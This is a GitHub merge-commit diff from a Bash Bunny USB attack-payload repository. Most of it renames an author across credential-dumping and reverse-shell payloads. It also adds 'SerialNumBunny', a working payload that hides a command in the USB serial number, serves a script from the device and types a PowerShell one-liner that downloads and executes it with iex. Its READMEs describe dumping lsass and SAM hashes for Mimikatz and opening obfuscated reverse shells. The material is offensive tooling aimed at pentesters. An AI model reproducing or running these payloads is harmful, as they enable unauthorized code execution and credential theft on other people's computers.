Merge pull request #655 from 0i41E/master

Uploaded SerialNumBunny
pull/614/merge
Peaks 2024-06-09 16:30:16 -04:00 committed by GitHub
commit fddae91cc5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
27 changed files with 113 additions and 33 deletions

View File

@ -1,7 +1,7 @@
# Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3
# Props: saintcrossbow & 0iphor13
# Props: saintcrossbow & 0i41E
# Version: 1.0.2.0 (Work in Progress)
# Category: Credentials
# Target: Windows (Logged in)

View File

@ -1,7 +1,7 @@
# Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3
# Props: saintcrossbow & 0iphor13
# Props: saintcrossbow & 0i41E
# Version: 1.0.2.0 (Work in Progress)
# Category: Credentials
# Target: Windows (Logged in)

View File

@ -1,6 +1,6 @@
**Title: HashDumpBunny**
Author: 0iphor13
Author: 0i41E
Version: 1.0
@ -17,4 +17,4 @@ Place BunnyDump.bat in the same payload switch-folder as your payload.txt
#
Plug in BashBunny.
Exfiltrate the out.txt file and try to crack the hashes.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)

View File

@ -2,7 +2,7 @@
#
# Title: HashDumpBunny
# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
# Author: 0iphor13
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage

View File

@ -1,6 +1,6 @@
**Title: MiniDumpBunny**
Author: 0iphor13
Author: 0i41E
Version: 1.0
@ -14,4 +14,4 @@ What is MiniDumpBunny?
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
#
Exfiltrate the .dmp file and read it with Mimikatz.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)

View File

@ -2,7 +2,7 @@
#
# Title: MiniDumpBunny
# Description: Dump lsass with this script, which was obfuscated with multiple layers.
# Author: 0iphor13
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage

View File

@ -1,6 +1,6 @@
**Title: ProcDumpBunny**
Author: 0iphor13
Author: 0i41E
Version: 1.0
@ -12,10 +12,10 @@ What is ProcDumpBunny?
**Instruction:**
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
Place Bunny.exe in the same payload switch as your payload
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
#
Plug in BashBunny.
Exfiltrate the out.dmp file and read it with Mimikatz.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)

View File

@ -2,7 +2,7 @@
#
# Title: ProcDumpBunny
# Description: Dump lsass.exe with a renamed version of procdump
# Author: 0iphor13
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage

View File

@ -1,6 +1,6 @@
**Title: SamDumpBunny**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.0<br>
@ -21,4 +21,4 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)

View File

@ -2,7 +2,7 @@
#
# Title: SamDumpBunny
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
# Author: 0iphor13
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage

View File

@ -1,6 +1,6 @@
**Title: SessionBunny**
Author: 0iphor13
Author: 0i41E
(Credit for SessionGopher: Brandon Arvanaghi)
Version: 1.0
@ -19,4 +19,4 @@ Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt
#
Plug in BashBunny.
Wait for the script to finish and decide what you wanna do with the information gathered
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)

View File

@ -43,7 +43,7 @@
o
o_
/ ". SessionGopher
," _-" Bunny Edition (0iphor13)
," _-" Bunny Edition (0i41E)
," m m
..+ ) Brandon Arvanaghi
`m..m @arvanaghi | arvanaghi.com

View File

@ -1,7 +1,7 @@
#!/bin/bash
#
# Title: SessionBunny
# Author: 0iphor13
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage

View File

@ -0,0 +1,15 @@
#This is just an example script, you may want to replace it with a script of your choice
$Picture=@"
_____ _____ _____ _____ _____ _____ _____ _____ __ __
(\___/) | __ || _ || __|| | | | __ || | || | || | || | |
(='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|
(")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_|
Bash Bunny by Hak5 USB Attack/Automation Platform
"@
Sleep -s 5
Write-Host -ForegroundColor red "$Picture"
Sleep -s 2
Write-Host -ForegroundColor green "SerialNumBunny by 0i41E"

Binary file not shown.

After

Width:  |  Height:  |  Size: 31 KiB

View File

@ -0,0 +1,46 @@
#!/bin/bash
#
# Title: SerialNumBunny
# Description: Execute strings placed in the Bunny serial number
# Author: 0i41E
# Version: 1.0
# Category: Execution
# Attackmodes: HID, RNDIS_ETHERNET
# Starting as Ethernet device only first to get IP
LED SETUP
ATTACKMODE RNDIS_ETHERNET
GET SWITCH_POSITION
GET HOST_IP
# Switch to Ethernet & HID
LED Y
# Defining Device Identifiers - Serialnumber contains payload
ATTACKMODE RNDIS_ETHERNET HID VID_0XF000 PID_0X1234 MAN_HAK5 PROD_BASHBUNNY SN_IWR_-URI_HTTP://$HOST_IP/1.PS1
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell"
Q DELAY 500
Q ENTER
Q DELAY 1000
# Make sure that device ID matches what was defined above
Q STRING "((Get-PnpDevice -PresentOnly -Class USB | Where-Object { \$_.DeviceID -like \"*F000*\" } | ForEach-Object { (\$_).DeviceID -split '\\\\' | Select-Object -Last 1 }) -join '').Replace('_', ' ')|iex|iex"
Q DELAY 400
Q ENTER
LED FINISH

View File

@ -0,0 +1,19 @@
**Title: SerialNumBunny**
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.0<br>
**What is SerialNumBunny?**
*It is pretty simple... The BashBunny enables you to set its USB identifiers. You can change VID, PID, Manufacturer and of course, the Serial number. Now we do the little trick here and place our payload within the serial number. Then starting a webserver on the Bunny, where a script is hosted and call the serial number via powershell on the target system. The content of the retrieved script is then executed on the target. Easy as that.*
You can get pretty creative here, from basically calling basic powershell commands, up to this example where you execute remote scripts.
**Instruction:**
- Upload your script or the example provided onto your Bunnys switch folder.
- Plug in the Bunny and let the magic happen.
![SerialNumBunny](https://github.com/0i41E/bashbunny-payloads/assets/79219148/fa11d9b5-e2f2-45a9-a701-5a25220ca226)
_Note: If you want to adapt your payload nested, in the serial number, you may need to stay in a certain character limit. In my case this was 40 characters. This might be different, depending on your target. Also make sure to replace spaces within the serial number with underscores._

View File

@ -2,7 +2,7 @@
#
# Title: WifiSnatch
# Description: Extract wifi information, such as passphrases & SSIDs
# Author: 0iphor13
# Author: 0i41E
# Version: 1.1
# Category: Exfiltration
# Attackmodes: HID, Storage

View File

@ -105,7 +105,7 @@ Arf
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter)

View File

@ -93,7 +93,7 @@ I am Jakoby
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter)

View File

@ -15,7 +15,7 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by 0iphor13 for PingZhellBunny
# Modified by 0i41E for PingZhellBunny
#
#
#

View File

@ -1,6 +1,6 @@
**Title: PingZhellBunny**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.5<br>

View File

@ -2,7 +2,7 @@
#
# Title: PingZhellBunny
# Description: Getting remote access via ICMP
# Author: 0iphor13
# Author: 0i41E
# Version: 1.5
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET

View File

@ -1,6 +1,6 @@
**Title: ReverseBunny**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.5<br>
@ -8,7 +8,7 @@ Version: 1.5<br>
<p>!Getting remote access via obfuscated reverse shell!<br>
Upload payload.txt and RevBunny.ps1 onto your Bunny
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>

View File

@ -2,7 +2,7 @@
#
# Title: ReverseBunny
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13
# Author: 0i41E
# Version: 1.5
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET

View File

@ -1,6 +1,6 @@
**Title: ReverseBunnySSL**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.2<br>
For input and inspiration - Thanks to: Cribbit, sebkinne</p>
@ -26,5 +26,5 @@ I recommend openssl itself or ncat - Example syntax for both:<br>
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)

View File

@ -2,7 +2,7 @@
#
# Title: ReverseBunnySSL
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13
# Author: 0i41E
# Version: 1.2
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET